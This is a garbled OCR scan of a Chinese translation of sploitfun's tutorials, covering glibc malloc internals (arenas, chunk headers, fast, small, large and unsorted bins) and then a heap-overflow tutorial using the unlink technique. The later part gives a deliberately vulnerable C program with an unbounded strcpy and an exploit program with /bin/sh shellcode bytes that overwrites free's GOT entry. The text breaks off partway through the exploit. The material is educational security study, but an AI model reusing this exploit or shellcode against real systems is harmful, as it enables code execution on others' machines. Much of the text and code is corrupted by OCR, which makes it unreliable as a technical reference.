Welcome to per thread arena example::6501 


Before malloc in main thread 


After malloc and before free in main thread 


After free in main thread 
Before malloc in thread 1 


After malloc and before free in thread 1 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ cat /proc 


/6501/maps 


08048000-08049000 r-xp 00000000 08:01 


/ptmalloc.ppt/mthread/mthread 

08049000-0804a000 r--p 00000000 
/ptmalloc.ppt/mthread/mthread 

0804a000-0804b000 rw-p 00001000 
/ptmalloc.ppt/mthread/mthread 

0804b000-0806c000 rw-p 00000000 
b7500000-b7521000 rw-p 00000000 
b7521000-b7600000 ---p 00000000 
b7604000-b7605000 ---p 00000000 
b7605000-b7e07000 rw-p 00000000 


08 


08 


00 
00 
00 
00 
00 


:01 


:01 


:00 
:00 
:00 
:00 
:00 


539625 


539625 


539625 


CDOS OD 


/home/sploitfun 
/home/sploitfun 
/home/sploitfun 


[heap] 


[stack:6594] 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ 


在 thread1 free 之 后 


在 如 下 的 输出 结果 中 我 们 可 以 看 出 free 掉 的 分 配 的 内 存 区 域 这 一 过 程 并 不 会 把 堆 内 


存 归 还 给 操作 系统 ， 而 是 仅仅 是 移交 给 了 [glibc malloc! ， 然 后 添加 在 了 [thread 


arenas bin」 中 。 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ ./mthread 


Welcome to per thread arena example::6501 
Before malloc in main thread 

After malloc and before free in main thread 
After free in main thread 

Before malloc in thread 1 

After malloc and before free in thread 1 
After free in thread 1 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ cat /proc 
/6501/maps 


08048000-08049000 r-xp 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 
08049000-0804a000 r--p 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 
0804a000-0804b000 rw-p 00001000 08:01 539625 /home/sploitfun 


/ptmalloc.ppt/mthread/mthread 

0804b000-0806c000 rw-p 00000000 00:00 
b7500000-b7521000 rw-p 00000000 00:00 
b7521000-b7600000 ---p 00000000 00:00 
b7604000-b7605000 ---p 00000000 00:00 
b7605000-b7e07000 rw-p 00000000 00:00 


[heap] 


OO0O000 


[stack:6594] 


sploitfunQsploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ 


Arena 


Arena 的 数量 


在 如 下 的 例子 中 ， 我 们 可 以 看 见 主 线程 包含 main arena] 而 thread 1 包含 它 自 有 

ág [thread arena] 。 所 以 若 不 计 线 程 的 数量 ， 在 线程 和 Tarenal 2A Zeie 
对 一 映射 关系 ? 当然 不 存在 ， 部 分 极端 的 应 用 其 至 运行 比 处 理 器 核心 的 数量 还 多 的 
线程 ， 在 这 种 情况 下 ， 每 个 线程 都 拥有 一 个 l'arenal 开销 过 高 且 意义 不 大 。 因 

此 ， 应 用 的 Tarena) 数量 限制 是 基于 系统 的 核心 数 的 。 


For 32 bit Systems : 

Number of arena = 2 * number of cores + 1. 
For 64 bit systems: 

Number of arena = 8 * number of cores + 1. 


Multiple Arena 


举例 而 言 : 让 我 们 来 看 一 个 运行 在 单 核 计 算 机 上 的 32 位 操作 系统 上 的 多 线程 应 用 
(4 线程 = 主线 程 + 3 个 用 户 线程 ) 的 例子 。 这 里 线程 数量 (4) 大 于 核心 数 的 二 倍加 
一 ， 因 此 在 这 种 条 件 下 ，『glibc malloc] 认定 l'multiple arenas] 会 被 所 有 可 用 线 


程 共享 。 那 么 它 是 如 何 共 享 的 呢 ? 


e 当主 线程 第 一 次 调用 malloc 时 ， 已 经 建立 的 「main arena) 会 被 没有 任何 竞 
争 地 使 用 。 

e 3 thread 1 和 thread 2 第 一 次 调用 malloc 时 ， 一 块 新 的 Tarena] 就 被 创建 且 
会 被 没有 任何 竞争 地 使 用 。 此 时 线程 和 l'arena] 之 间 有 着 一 对 一 的 映射 关 

e X thread3 第 一 次 调用 malloc 时 ， Tarena) 的 数量 限制 被 计算 出 来 。 这 里 超 
过 了 Tarena) 的 数量 限制 ， 因 此 尝试 复 用 已 经 存在 的 [arena」 ( [Main 
arena | X Arena 1 X Arena 2) ° 

e 4M: 


o 一 旦 遍历 出 可 用 arenaj ， 就 开始 自 旋 申请 该 [arena」 的 锁 。 
o 如 果 上 和 锁 成 功 (比如 说 [main arena] ARD) ， 就 将 该 Tarena] 返 
回 用 户 。 
o 如 果 查 无 可 用 Tarenal > thread 3 的 malloc 操作 阻塞 ， 直 到 有 可 用 的 
[arena] 为 止 。 
e 当 thread 3 第 二 次 调用 malloc 时 ，malloc 会 党 试 使 用 上 一 次 使 用 的 Tarenal 
(Tmain arenaJd ) 。 当 I main arena) 可 用 时 就 用 ， 否 则 thread 3 就 一 直 阻 
塞 直至 [main arena! 3X free 掉 。 因 此 现在 [main arena] 实际 上 是 被 
[main thread | 和 thread 3 所 共享 。 


Multiple Heaps 


在 [glibc malloc] 中 主要 发 现 了 3 种 数据 结构 : heap info ——Heap Header—— 
—^* l thread arena 」 可 以 有 多 个 堆 。 每 个 堆 都 有 自己 的 扒 Header。 为 什么 需要 
多 个 堆 ? Si | thread arena | 都 只 包含 一 个 堆 ， 但 是 当 这 个 堆 段 空间 耗 尽 时 ， 
新 的 堆 〈 非 连续 区 域 ) 就 会 被 mmap 到 这 个 laerna] 。 malloc state ——Arena 
header 一 一 一 个 lthread arena 」 可 以 有 多 个 堆 ， 但 是 所 有 这 些 堆 只 存在 
Farena] header ° larena header | 包括 的 信息 有 : [bins」 ^» [top 
chunk} ^» llastremainder chunk] ...... malloc chunk ——Chunk header—— — 
个 堆 根 据 用 户 请 求 被 分 为 若干 [Tchunk」。 每 个 这 样 的 Tchunk) 都 有 自己 的 
I chunk] header ° 
e [Main arena) 没有 多 个 堆 ， 因 此 没有 Theap info] 结构 。 当 main 
arena] 空间 耗 尺 时 ， 就 拓展 Sbrk 获得 的 堆 段 (拓展 后 是 连续 内 存 区 
X) ， 直 至 “ 碰 " 到 内 存 映 射 区 为 止 。 
e 不 像 [thread arena] > | main arena] 的 larena 」header 不 是 sbrk 获 
得 的 堆 段 的 一 部 分 ， 而 是 一 个 全 局 变量 ， 因 此 它 可 以 在 libc.so 的 数据 段 
中 被 找到 。 


理解 glibc malloc 


[main arena 和 Tthread arena] 的 图 示 如 下 ( 单 堆 段 ) 


0x806c000 


malloc state: 






main arena 
present in 
data segment 
(of libc.so) 


NOTE: Main arena dont 
have heap info. 


Chunks: 0x804b000 
Heap Segment 
(of process) 
Main Arena 


[thread arena] 的 图 示 如 下 (多 扒 段 ) 


0xb7521000 





malloc state: 


3 0xb7500000 
heap info: 


Memory Mapping Segment 
(of process) 


Thread Arena 
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0xb7600000 





0xb7921000 






I 






Chunks: 





NOTE: Thread arena with 
multiple heaps has only one 
malloc state. 





malloc state: 







prev = NULL 








Chunks: 
heap info: 0xb7900000 heap. info: an | 0xb7500000 
Memory Mapping Segment 2 Memory Mapping Segment 1 


(of process) (of process) 


Thread Arena (with multiple heaps) 


Chunk 


扒 段 中 能 找到 的 Tchunk 1 类 型 如 下 : 


Allocated chunk 

Free chunk 

Top chunk 

Last Remainder chunk 


Allocated chunk 
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理解 glibc malloc 


chunk 


next chunk 





Allocated Chunk 


prev size : 若 上 一 个 Tchunkj 可 用 ， 则 此 结构 成 员 赋值 为 上 一 个 FL chunk] 的 大 
小 ; 否则 若 上 一 个 [chunk] 被 分 配 ， 此 此 结构 成 员 赋 值 为 上 一 个 Tchunkj 的 用 户 
数据 大 小 。 size : 此 结构 成 员 赋值 为 已 分 配 chunk] 大 小 ， 其 最 后 三 位 包含 标志 
(flag) 信 息 。 


e PREV INUSE (P) - 置 “ 人 表示 上 一 个 Tchunk」 被 分 配 ; 

e IS_MMAPPED (M) - 置 “人 表示 这 一 个 [chunk] 是 直接 mmap 申请 

e NON MAIN ARENA (N) - 置 “ 人 表示 这 一 个 chunk] 属于 一 个 oo 
arenal ° 


LEA 
ER: 


e malloc chunk 中 的 其 余 结 构成 员 ， 如 fd、bk 不 用 于 已 分 配 的 
[chunk] ， 因 此 它们 被 拿 来 存储 用 户 数据 ; 

e 用 户 请 求 的 大 小 被 转换 为 可 用 大 人 小 (内 部 显示 大 小 ) ， 因 为 需要 一 些 额 外 
的 空间 存储 malloc_chunk， 此 外 还 需要 考虑 对 齐 的 因素 。 


Free chunk 
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理解 glibc malloc 


chunk 


next chunk 





Free Chunk 


prev size : 两 个 空间 [chunkj 不 能 毗连 ， 而 应 合并 成 一 个 。 因 此 前 一 个 

[chunk」 和 这 一 个 空闲 都 会 被 分 配 ， 此 时 prev. size 中 保存 上 一 个 
[chunk] 的 用 户 数 据 。 size: 该 结构 成 员 保 存 本 空间 [chunkj 的 大 小 。fd : 
Forward pointer 指向 同一 bin: 中 的 下 一 个 Tchunk」 (而 非 物理 内 存 中 下 一 
块 ) i Seil — Thin} 中 的 上 一 个 TchunkJ」 (而 非 物 
理 内 存 中 上 一 块 ) 








Bins 


[bins] 就 是 空闲 列表 数据 结构 。 它 们 用 以 保存 空闲 Tchunkj」 。 基 于 Tchunkj 的 
大 小 ， 有 下 列 几 种 可 用 lbinsJ 


Fast bin 
Unsorted bin 
Small bin 
Large bin 


保存 这 些 [bins] 的 数据 结构 为 : 


fastbinsY : 这 个 数组 用 以 保存 [fast binsj ° bins : 这 个 数组 用 以 保存 l'unsorted 
bin] ^ lsmall bins] 以 及 [large bins) ， 共 计 可 容纳 126 ^: 


e Bin 1—— [unsorted bin | 
e Bin 2 到 Bin 63 —— [small bins | 
e Bin 64 到 Bin 126 —— [large bins | 
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Fast Bin 


大 小 为 16 ~ 80 字 节 的 chunk 被 称 为 l'fastchunk] 。 在 所 有 的 Thins) 中 ， [fast 
bins I 在 内 存 分 配 以 及 释放 上 有 更 快 的 速度 。 


e 数量 一 一 10 


o 每 个 lfast bin] 都 记录 着 一 条 free [chunk] 的 单 链表 ( 称 为 「binlistj 
， 采用 单 链表 是 出 于 [fast bins) 中 链表 中 部 的 chunk] 不 会 被 摘除 的 特 
A) ， 增 删 Tchunkj 都 发 生 在 链表 的 前 端 。 LIFO 
e 大 小 8 字 节 递增 


o [fast bins」 记录 着 大 小 以 8 字 节 递增 的 「binlistj 。 也 即 ， [fast bin] 
(index 0) 记 录 着 大 小 为 16 字 节 的 chunk] #9 Tbinlist| ^ fast bin | 
(index 1) 记录 着 大 小 为 24 字 节 的 [chunk] 的 Tbinlist) 依次 类 推 ...... 

o 指定 [fast bin」 中 所 有 [chunk] 大 小 均 相同 。 

e 在 malloc 初始 化 过 程 中 ， 最 大 的 [fast bin] 的 大 小 被 设置 为 64 而 非 80 F 
节 。 因 为 默认 情况 下 只 有 大 小 16 ~ 64 的 『chunkj 被 分 类 为 [fast chunk] ° 
e 不 能 合并 两 个 毗连 的 空闲 chunk] 并 不 会 被 合并 成 一 个 空闲 
[chunk] 。 不 合并 可 能 会 导致 碎片 化 问题 ， 但 是 却 可 以 大 大 加 速 释放 的 过 
Fz. | 
e malloc( [fast chunk ) 

o 初始 情况 下 lfast bin] J& X PLE X VUA 48 RIRA > Hai HE] 

户 请 求 fast chunk) ， 服 务 的 也 将 是 [small bin]. codeMm3E | fast bin | 


code > 
o 当 它 非 空 后 ，Tfast bin」 索引 将 被 计算 以 检索 对 应 [binlistj ° 
o [binlistj 中 被 检索 的 第 一 个 [chunk] 将 被 摘除 并 返回 给 用 户 。 
e free( | fast chunkj ) 


o [fast bin」 索引 被 计算 以 索引 相应 [binlistj ° 
o free #249 [chunk] 将 被 添加 在 索引 到 的 「binlist」 的 前 端 。 
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Oxb7fd8408  Oxb7fd840c Oxb7fd8410 Oxb7fd8420 Oxb7fd842c 


Unused space (16 Unused space (48 
bytes) bytes) 


main arena 
fastbinsY 








Unused space (0 
bytes) 





0x804b000 0x804b050 


Unused space (16 
bytes) 


Fast Bin Snapshot 


Unsorted Bin 


4 [small chunk] 和 large chunk] 3& free 掉 时 ， 它 们 并 非 被 添加 到 各 自 的 bin 
中 ， 而 是 被 添加 在 lunsorted bin] 中。 这 种 途径 给 了 予 lglibc malloc) 重新 使 用 最 
i free 掉 的 『chunkj 的 第 二 次 机 会 ， 这 样 寻 找 合适 [bins 的 时 间 开 销 就 被 抹 掉 
了 ， 因 此 内 存 的 分 配 和 释放 会 更 快 一 点 。 


e 数量 一 一 1 
o [unsorted bin] 包括 一 个 用 于 保存 空闲 「chunk」 的 双向 循环 链表 (又 名 


Tbinlist] ) ° 
e [chunk] 大 小 





无 尺寸 限制 ， 任 何 大 小 [chunkj」 都 可 以 添加 进 这 里 。 
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Bin1 - Unsorted bin Bin13 - Small bin Bin71 - Large bin 
Oxb7fd8438 Oxb7fd843c Oxb7fd8498 ` Oxb7fd849c Oxb7fd8668 ` Oxb7fd866c 


fd = bk = fd = bk = fd = bk = 
0x804b000 | 0x804b3a8 [[ 0x8040138 | 0x804b270 [ | 0x804be60 | ox804b9a0 
Unused space (88 Unused space (88 Unused space 
bytes) bytes) (1008 bytes) 


bk=0xb7fd8430 bk=0xb7fd8490 bk=0xb7fd8660 










main arena 
bins 












fd = 0x804b4e0 fd = 0x804b270 fd = 0x804b9a0 
size=104 bytes size=104 bytes size=1024 bytes 














0x804b000 





0x804be60 












bytes) 
| _bk=0x804b4e0 - 
| size-i04bytes | 
0x804b3a8 0x804b010 


Unsorted, Small and Large Bin Snapshot 


Unused space Unused space (88 Unused s| 
pace 
E E 





0x804b4e0 





mall Bin 


大 小 小 于 512 字 节 的 l'chunk| Zä small chunk) ;而 保存 [small 
chunks] #9 [bin] rž [small bin]. 。 在 内 存 分 配 回收 的 速度 上 ， [small 
bin] 比 Tlarge bin]. 更 快 。 


数量 一 一 62 


o 每 个 Tsmall bin] 都 包括 一 个 空闲 区 块 的 双向 循环 链表 (也 称 
Ibinlist| ) ° free 掉 的 [Tchunk 添加 在 链表 的 前 端 ， 而 所 需 「chunkj 
则 从 链表 后 端 摘除 。 FIFO 
大 小 8 字 节 递增 


o [small bin」 记录 着 大 小 以 8 字 节 递增 的 [bin] 链表 。 也 即 ， 第 一 个 
[small bin] (Bin 2) 记 录 着 大 小 为 16 字 节 的 Tchunkj 的 lbinlist] ^ 
"small bin] (Bin 3) 记 录 着 大 小 为 24 字 节 的 Tchunk) 的 Tbinitset) 依次 类 

JÉ...... 
o 指定 [small bin」 中 所 有 [chunkj 大 小 均 相 同 ， 因 此 无 需 排 序 。 
合并 两 个 毗连 的 空闲 [chunkJ」 会 被 合并 成 一 个 空闲 Tchunki 。 合 并 消除 
了 碎片 化 的 影响 但 是 减 慢 了 free 的 速度 。 
malloc ( [small chunk ) 











o 初始 情况 下 ，「small bin) 都 会 是 NULL， 因 此 尽管 用 户 请 求 [small 
chunk」， 提 供 服务 的 将 是 Tunsorted bin]. code 而 不 是 [fsmall bin | 
code ° 

o 同样 地 ， 在 第 一 次 调用 malloc 期 间 ， 在 malloc state 找到 的 Tsmall 
bin! 和 Tlarge bin] 数据 结构 被 初始 化 ，「bin」 都 会 指向 它们 本 身 以 表 


示 lbinlist] 为 空 。 
o 此 后 当 「small bin] #24 Ja 89 [bin] 会 摘除 lbinlist] 中 最 后 一 个 
| chunk | 并 返回 给 Ans, ° 
e free ( [small chunk] ) 


o 在 free 一 个 Tchunkj 的 时 候 ， 检 查 其 前 或 其 后 的 chunk] ZR EP E 


是 则 合并 ， 也 即 把 它们 从 所 属 的 链表 中 摘除 并 合并 成 一 个 新 的 
[chunk] ， 新 [chunkj 会 添加 在 lunsorted bin | 链表 的 前 端 。 


Large Bin 
大 小 大 于 等 于 512 字 节 的 『chunkj 被 称 为 Tage chunk | P large 
chunks] éi [bin] 被 称 为 llarge bin」。 在 内 存 分 配 回收 的 速 > Tlarge bin | 
H [small bin] 慢 。 

e 数量 一 一 63 


o 每 个 Tlarge bin] 都 包括 一 个 空闲 区 块 的 双向 循环 链表 (也 称 
[binlist] ) ° free #249 [chunk] 添加 在 链表 的 前 端 ， 而 所 需 [chunk] 
则 从 链表 后 端 摘除 。 FIFO 

o 超过 63 个 [bin] 之 后 


= 前 32 个 [bin」 记 录 着 大 小 以 64 字 节 递增 的 『bin」 链表， 也 即 第 一 
个 [large chunk. (Bin 65) 记 录 着 大 小 为 512 字 节 ~ 568 字 节 的 
[chunk] 的 lbinlist] 、 第 二 个 Marge chunk! (Bin 66) 记 录 着 大 小 
为 576 字 节 到 632 F74 [chunk] 4 lbinlist] ， 依 次 类 推 ...... 
后 16 个 Thin) 记录 着 大 小 以 512 字 节 递增 的 Ibin] 链表 。 
后 8 个 Tbin」 记录 着 大 小 以 4096 字 节 递增 的 Thin] 链表 。 
后 4 个 Tbin」 记录 着 大 小 以 32768 字 节 递增 的 Thin] 链表 。 
后 2 个 Tbin」 记录 着 大 小 以 262144 字 节 递增 的 『bin」 链表 。 
= RE 1^ bind 记录 着 大 小 为 剩余 大 小 的 [chunk」。 

o 不 像 small bin] > large bin 中 所 有 [chunki 大 小 不 一 定 相同 ， 因 此 各 
「chunk」 需要 递减 保存 。 最 大 的 [chunk] 保存 在 最 前 的 位 置 ， 而 最 小 的 
[chunk] 保存 在 最 后 的 位 置 。 

e 合并 一 一 两 个 毗连 的 空闲 chunk 会 被 合并 成 一 个 空闲 chunk] > 
e malloc ( [large chunk ) 


o 初始 情况 下 ，large bina’ 2 NULL > ALLA SA PAR large 
chunk] ， 提 供 服 务 的 将 是 [next largetst bin code] 而 不 是 [large bin 
code] ° 

o 同样 地 ， 在 第 一 次 调用 malloc 期 间 ， 在 malloc state 找到 的 Toma 
bins 和 Marge bin.] 数据 结构 被 初始 化 ， bin 都 会 指向 它们 本 身 以 表示 
| binlist] 为 空 。 

o 此 后 当 「smallbin」 非 空 后 ， 当 最 大 [chunk] 大 小 (在 相应 lbinlist] 中 
的 ) 大 于 用 户 所 请 求 的 大 小 时 ， Tbinlist」 就 从 顶部 遍历 到 底部 以 找到 一 
个 大 小 最 接近 用 户 需 求 的 『chunk」 。 一 旦 找到 ， 相 应 [chunk] 就 会 分 成 
两 块 : 





= [lUserchunk| (用 户 请 求 大 小 ) 一 一 返回 给 用 户 。 





= [Remainder chunk] (剩余 大 小 ) 添加 到 l'unsorted bin] ° 
o S X [chunk] Ah (484 lbinlist] 中 的 ) 小 于 用 户 所 请 求 的 大 小 
Ito ŽRE [Next largest bin」 中 查 到 到 所 需 的 【chunkJ」 以 响应 用 户 请 
R o T next largetst bin code] 会 扫描 「 binmaps」 以 找到 下 一 个 最 大 非 
= [bin] ， 如 果 这 样 的 [bin TRET > MME PA 「binlistj 中 检索 到 合 
适 的 『chunk」 并 返回 给 用 户 ; 反之 就 使 用 [top chunk] 以 响应 用 户 请 
e free ( [large chunk] ) 一 一 类 似 于 [small chunk] ° 


Top Chunk 


一 个 Tarena」 中 最 顶部 的 Tchunkj 被 称 为 『top chunki ° € RA TIET 
[bin] 。 在 所 有 [bind 中 都 没有 合适 空闲 内 存 区 块 的 时 候 ， 才 会 使 用 Top 
chunk | oran n E! oe chunk] 大 小 比 用 户 所 请 求 大 小 还 大 的 时 候 ， 
[top chunk] 会 分 为 两 个 部 分 


e TUser chunk」 (用 户 请 求 大 小 ) 
e [Remainder chunk] (剩余 大 小 ) 


其 中 [Remainder chunk] 成 为 新 的 [top chunk] 。 当 [top chunk) 大 小 小 于 用 
户 所 请 求 的 大 小 时 [top chunk] 就 通过 sbrk ( [main arena] ) 或 
mmap ( [thread arena] ) 系统 调用 来 扩容 。 


Last Remainder Chunk 


最 后 一 次 small request 中 因 分 割 而 得 到 的 Remainder。 llast remainder chunk | 
有 助 于 改进 引用 的 局 部 性 ， 也 即 连 续 dii xt l'small chunk] 的 malloc 请 求 可 能 最 终 
导致 各 [chunk] 被 分 配 得 彼此 贴近 


但 是 除了 在 一 个 larena] 里 可 用 的 的 诸 [Tchunk」 ， 哪 些 Tchunk」 有 资格 成 为 
last remainder chunk | 呢 ? 


当 一 个 用 户 请 求 [small chunk] 而 无 法 从 [small bin] 和 Tunsorted bin] 得 到 服 
Fi > lbinmaps] 就 会 扫描 下 一 个 最 大 非 空 "bin ( 译 者 注 : [top chunk] 不 
属于 任何 [bind ) 。 正 如 前 文 所 提 及 的 ， 如 果 这 样 的 D bin] 找到 了 ， 其 中 最 适 
[chunk] 就 会 分 割 为 两 部 分 : 返回 给 用 户 的 l'User chunk] 、 添 加 到 Tunsorted 
bin] 中 的 [Remainder chunk] 。 此 外 ， 这 一 l'Remainder chunk |. 还 会 成 为 最 新 
的 [last remainder chunk > 


那么 参考 局 部 性 是 如 何 实现 的 呢 ? 


现在 当 用 户 随 后 的 请 求 是 请 求 一 块 [small chunk」 #4 Tlast remainder chunk | 
是 bin] 中 唯一 的 [chunki > [last remainder chunk] 就 分 割 成 两 部 

给 用 户 的 [User chunk」“、 添 加 到 [unsorted bin」 中 的 [Remainder 
See 。 此 外 ， 这 一 [Remainder chunk | 还 会 成 为 最 新 的 l'last e 
chunk] 。 因 此 随后 的 内 存 分 配 最 终 导 致 各 D chunk] 被 分 配 得 彼此 贴近 
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使 用 unlink 4528 d 


译 者 : 飞龙 

原文 : Heap overflow using unlink 
预备 条 件 : 

1. 理解 glibc malloc 


这 篇 文章 中 ， 让 我 们 了 解 如 何 使 用 unlink 技巧 成 功利 用 堆 溢 出 。 但 是 在 了 解 它 之 
前 ， 首 先 让 我 们 看 看 漏洞 程序 : 


Le 
Heap overflow vulnerable program. 
7 

#include <stdlib.h> 

#include <string.h> 


int main( int argc, char * argv[] ) 
{ 


char * first, * second; 


211177 first = malloc( 666 ); 
/*[2]*/ second = malloc( 12 ); 
if(argc!z1) 

strepy( first, argv[i] ); 
free( first ); 
free( second ); 
return( © ); 


上 面 程序 的 行 [3] 会 导致 堆 溢出 。 用 户 输入 argv[1] 复制 给 了 堆 缓 冲 
区 first ， 没 有 任何 大 小 限制 。 因 此 ， 当 用 户 输入 大 于 666 FYN > CHARA 
下 一 个 块 的 头 部 。 这 个 溢出 会 导致 任意 代码 执行 。 


看 一 看 漏洞 程序 的 堆 内 存 图 片 : 


使 用 unlink 的 堆 溢出 


0x806b000 


size=0x20d51 
e 


second 一 人 


Size=0x11 
Second chunk pointer —————> 


first ”一 人 





size=UxZa 
; i — 
First chunk pointer m 0x804a000 
Heap Segment 


unlink : 这 个 技巧 的 核心 思想 ， 就 是 其 骗 glibc malloc 3& unlink 4& 2% ° unlink 
free 的 GOT 条目 会 使 其 被 shellcode 地 址 覆盖 。 在 成 功 履 盖 之 后 ， 现 在 在 

行 [5] > free 被 漏洞 程序 调用 时 ，shellcode 就 会 执行 。 不 是 很 清楚 嘛 ? 没 问 

题 ， 首 先 让 我 们 看 看 执行 free 时 ，glibc malloc 在 干什么 。 


如 果 没 有 攻击 者 影响 ， 行 [4] 的 free 会 做 这 些 事情 : 


e 对 于 不 是 mmap 的 块 ， 会 向 前 或 向 后 合并 。 
e 向 后 合并 
o 查看 前 一 个 块 是 不 是 空闲 的 -- 前 一 个 块 是 空闲 的 ， 如 果 当 前 空闲 块 
的 PREV INUSE(P) 位 没有 设置 。 但 是 我 们 这 里 ， 前 一 个 块 是 分 配 的 ， 
为 它 的 PREV INUSE 位 设置 了 ， 通 常 堆 内 存 的 第 一 个 块 的 前 面 那个 块 是 
分 配 的 〈 即 使 它 不 存在 ) 。 
o hän, SHE > Alte» M binlist unlink ( 移 除 ) 前 一 个 块 ， 将 前 一 个 
块 的 大 小 与 当前 块 相 加 ， 并 将 块 指针 指向 前 一 个 快 。 但 是 我 们 这 里 ， 前 一 
个 快 是 分 配 的 ， 因 此 unlink 不 会 调用 。 当 前 空闲 块 first 不 能 向 后 合 
Jea 
e 向 前 合并 
o 查看 下 一 个 块 是 不 是 空闲 的 -- 下 一 个 块 是 空 帮 的， 如 果 下 下 个 块 (距离 当 
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前 空闲 块 ) 的 PREV INUSE(P) 位 没有 设置 。 为 了 访问 下 下 个 块 ， 将 当前 
块 的 大 小 加 到 它 的 块 指针 ， 再 将 下 一 个 块 的 大 小 加 到 下 一 个 块 指针 。 我 们 
这 里 ， 距 离 当 前 空闲 块 的 下 下 个 块 是 top 块 ， 它 的 PREV INUSE 位 已 设 
置 。 因 此 下 一 个 块 second xe FAY © 
o 如 果 是 空闲 的 ， 合 并 它 。 例 如 ， 从 它 的 binlist 中 unlink (BR) 下 一 个 

块 ， 并 将 下 一 个 块 的 大 小 添加 到 当前 大 小 。 但 是 我 们 这 里 ， 下 一 个 块 是 分 
配 的 ， 因 此 unlink 不 会 调用 。 当 前 空闲 块 first 不 能 向 前 合并 。 

e 现在 将 合并 后 的 块 添加 到 unsorted bin 中 。 我 们 这 里 ， 由 于 合并 没有 发 生 ， 只 

将 first 块 添加 到 票 unsorted bin 中 。 


现在 让 我 们 假设 ， 攻 击 者 在 行 [3] RAT second 块 的 块头 部 ， 像 这 样 : 


prev_size 为 偶数 ， 因 此 PREV_INUSE 是 未 设置 的 ， 
size = -4 

fd 为 free 的 地 址 减 12 

bk 为 Shellcode 的 地 址 


在 攻击 者 的 影响 下 ， 行 [4] 的 free 会 做 下 面 的 事情 : 


e 对 于 不 是 mmap 的 块 ， 会 向 前 或 向 后 合并 。 
e 向 后 合并 
o 查看 前 一 个 块 是 不 是 空闲 的 -- 前 一 个 块 是 空闲 的 ， 如 果 当 前 空闲 块 
的 PREV INUSE(P) 位 没有 设置 。 但 是 我 们 这 里 ， 前 一 个 块 是 分 配 的 ， 
AEH) PREV INUSE 位 设置 了 ， 通 常 堆 内 存 的 第 一 个 块 的 前 面 那个 块 是 
分 配 的 (即使 它 不 硝 在 ) ° 
o 如 果 空 闲 ， 合 并 它 。 例 如 ， 从 binlist unlink( 移 除 ) 前 一 个 块 ， 将 前 一 个 
块 的 大 小 与 当前 块 相 加 ， 并 将 块 指针 指向 前 一 个 快 。 但 是 我 们 这 里 ， 前 一 
个 快 是 分 配 的 ， 因 此 unlink 不 会 调用 。 当 前 空闲 块 first 不 能 向 后 合 
GE 
e 向 前 合并 
o 查看 下 一 个 块 是 不 是 空闲 的 -- 下 一 个 块 是 空 闪 的 ， 如 果 下 下 个 块 (距离 当 
前 空闲 块 ) 的 PREV INUSE (P) 位 未 设置 。 为 了 访问 下 下 个 块 ， 将 当前 
块 的 大 小 加 到 它 的 块 指针 ， 再 将 下 一 个 块 的 大 小 加 到 下 一 个 块 指针 。 我 们 
这 里 ， 距 离 当 前 空闲 块 的 下 下 个 块 不 是 top 块 。 下 下 个 块 在 second 块 的 
-4 偏 移 处 ， 因 为 攻击 者 将 second 块 的 大 小 履 盖 成 了 -4。 因 此 现在 glibc 
malloc 将 second 块 的 prev_inuse 字段 看 做 下 下 个 块 的 大 小 字段 。 由 
于 攻击 者 履 盖 了 一 个 偶数 (也 就 是 PREV_INUSE (P) 为 是 没有 设置 的 ) 
来 代替 prev size ，glibc malloc 被 其 骗 来 相信 second 块 是 空闲 的 。 
o 如 果 是 空闲 的 ， 合 并 它 。 例 如 ， 从 它 的 binlist 中 unlink ( 移 除 ) 下 一 个 
块 ， 并 将 下 一 个 块 的 大 小 添加 到 当前 大 小 。 我 们 这 里 下 一 个 块 是 空闲 的 ， 
因此 second 块 会 像 这 样 被 unlink : 
m 将 second 块 的 fd 和 bk 值 复制 到 FD 和 BK 变量 中 。 这 
里 ，FD 是 free 的 地 址 -12， BK X shellcode HE (AHH 
出 的 一 部 分 ， 攻 击 者 将 它 的 shellcode 放 到 了 first #2 K 


= BK 的 值 复制 到 了 距离 FD 偏 移 为 12 的 位 置 。 我 们 这 里 将 12 FT 
加 到 FD ， 就 指向 了 free 的 GOT 条 目 ， 因 此 现在 free 的 GOT 
& AE ART shellcode 地 址 。 好 的 。 现 在 无 论 free 在 哪里 调 


使 用 unlink 8928 33 H4 


H: shellcode 都 会 执行 。 因 此 漏洞 程序 中 行 [5] 的 执行 会 导致 


shellcode 执行 。 
o 现在 将 合并 后 的 块 添加 到 unsorted bin 中 。 


看 看 漏洞 程序 的 堆 内 存 的 图 片 ， 在 攻击 者 影响 用 户 输入 之 后 : 


Second chunk pointer 一 人 


first ”一 人 


First chunk pointer ——— — — 


Heap Segment 


理解 了 unlink 技巧 之 后 ， 让 我 们 编写 利用 程序 吧 





0x806b000 


0x804a000 


/* Program to exploit 'vuln' using unlink technique. 


= 
#include <string.h> 
#include <unistd.h> 


#define FUNCTION POINTER ( 0x0804978c ) 


//Address of GOT 


entry for free function obtained using "objdump -R vuln". 


#define CODE ADDRESS ( 0x0804a008 + 0x10 ) 
iable 'first' in vuln executable. 


Zdefine VULNERABLE "./vuln" 
define DUMMY Oxdefaced 
Zdefine PREV INUSE 0x1 


//Address of var 
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char shellcode[] - 

/* Jump instruction to jump past 10 bytes. ppssssffff - 
Of which ffff would be overwritten by unlink function 

(by statement BK->fd = FD). Hence if no jump exists shel 
l code would get corrupted by unlink function. 

Therefore store the actual shellcode 12 bytes past the b 
eginning of buffer 'first'*/ 

"\xeb\xOassppppffff" 

"NX3S1NXCONXBONX68NX2f NX2fNX73NX68NX68NX2f NX62NX69Nx6eNx8 
9Nxe3Nx5ONX89Nxe2Nx53Nx89Nxe1NxbONxObNxcdNx80" ; 


int main( void ) 
it 
char * p; 
char argvi[ 680 + 1 ]; 
char * argv[] = { VULNERABLE, argvi, NULL }; 


p = argvi; 

/* the fd field of the first chunk */ 

*( (void **)p ) = (void *)( DUMMY ); 

p += 4; 

/* the bk field of the first chunk */ 

*( (void **)p ) = (void *)( DUMMY ); 

p += 4; 

/* the fd nextsize field of the first chunk */ 

*( (void **)p ) = (void *)( DUMMY ); 

p += 4; 

/* the bk nextsize field of the first chunk */ 

*( (void **)p ) = (void *)( DUMMY ); 

p += 4; 

/* Copy the shellcode */ 

